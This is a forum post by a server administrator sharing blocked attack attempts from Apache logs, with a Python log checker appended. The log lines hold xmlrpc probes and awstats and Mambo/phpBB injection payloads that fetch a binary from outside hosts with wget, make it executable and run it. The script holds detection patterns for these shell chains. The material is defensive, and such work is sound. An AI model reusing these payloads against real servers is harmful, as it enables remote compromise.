Is there a new exploit / bug out there?

I was going through my error_log and access_log in /var/log/httpd and I'm noticing that there is a slew of compromised hosts out there running a script and trying to grab / execute / exploit some common things that people would be running. For instance:

Code:
<edit ip out> - - [19/Dec/2005:12:16:31 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:20 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:22 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:23 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:24 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:25 -0600] "POST /xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

and that's just one of 200 hosts trying that in my access_log. I also have: 

<edit ip out> - - [19/Dec/2005:15:11:47 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:15:11:51 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:15:11:56 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:00 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:02 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:04 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:00:51:46 -0600] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:00:51:48 -0600] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

and finally one example from my error_log:

[Sun Dec 18 16:28:51 2005] [error] [client <edit ip out>/ mod_security: Access denied with code 403. Pattern match "wget\\\\x20" at REQUEST_URI [hostname "<edit ip out>"] [uri "/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|"]

I know the first set is the XMLRPC stuff in PHP. The others are equally bothersome, but I'm not sure what's up with those. Anyways, the good news is that none of this is affecting my server other than that it's ballooning my logs. Access-wise I'm fairly secure and nothing extra or nasty is showing up to make my life miserable. What's really unfortunate is that 2 of the IPs that are hitting me are owned by fairly reputable hosts here on WHT. No, I'm not gonna bag on them because things happen. I've emailed their abuse departments and will give them 24 hours to fix it before I get nasty with them. Anyways, heads up. Might be old news but might be something new.

PS: sorry I screwed up the sizing of the screen, stupid URLs with long characters, not my intention...
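An added example, not part of the original post: a small Python log checker that applies the probe patterns shown above (xmlrpc.php POSTs, the awstats.pl configdir=| command injection, remote-file-include URLs in mosConfig_absolute_path / phpbb_root_path, the wget/chmod chain and the "echo YYY" marker) to Apache access_log lines and tallies hits per source IP. The log lines inside it are constructed to mirror the post's, with documentation-range placeholder IPs.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample modelled on the post's log lines; all IPs are
# documentation-range placeholders (RFC 5737), not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [19/Dec/2005:12:16:31 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0"
192.0.2.10 - - [19/Dec/2005:12:16:25 -0600] "POST /xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0"
192.0.2.11 - - [19/Dec/2005:15:11:47 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20198.51.100.5%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0"
192.0.2.12 - - [18/Dec/2005:16:29:00 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.7/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.7/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0"
192.0.2.13 - - [19/Dec/2005:00:51:46 -0600] "GET /Forums/admin/admin_styles.php?phpbb_root_path=http://198.51.100.9/cmd.gif?&cmd=cd%20/tmp;wget%20198.51.100.9/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0"
192.0.2.20 - - [19/Dec/2005:10:00:00 -0600] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""
# Apache combined log; the request line is matched loosely because the scanner URIs end in "|  ".
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>.*?)\s+HTTP/[\d.]+" (?P<status>\d{3})')
# A shell chain: a download/exec verb at the start of a value or right after ; | & `
SHELL_CHAIN = re.compile(r'(?:^|[;|&`])\s*(?:cd|wget|curl|chmod|sh|perl)\b')

def classify(method, uri):
    """Return the names of the scanner patterns from the post that one request matches."""
    parts = urlsplit(uri)
    path = parts.path.lower()
    query = unquote(parts.query)  # the awstats probe percent-encodes "/", ";" and "."
    values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
    tags = []
    if method == "POST" and path.endswith("/xmlrpc.php"):
        tags.append("xmlrpc-probe")
    if path.endswith("awstats.pl") and query.startswith("configdir=|"):
        tags.append("awstats-configdir-injection")
    if any(v.startswith(("http://", "https://", "ftp://")) for v in values):
        tags.append("remote-file-include")
    if SHELL_CHAIN.search(query):
        tags.append("shell-download-chain")
    if "echo YYY" in query:
        tags.append("YYY-output-marker")
    return tags

def scan(log_text):
    """Map each source IP to a Counter of matched pattern names; clean hosts are omitted."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for tag in classify(m["method"], m["uri"]):
            hits[m["ip"]][tag] += 1
    return dict(hits)
```

Run it over a real access_log (`scan(open("/var/log/httpd/access_log").read())`) to get the per-IP tally the post describes; an IP with many tags across several product paths is the "one script trying everything" signature.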
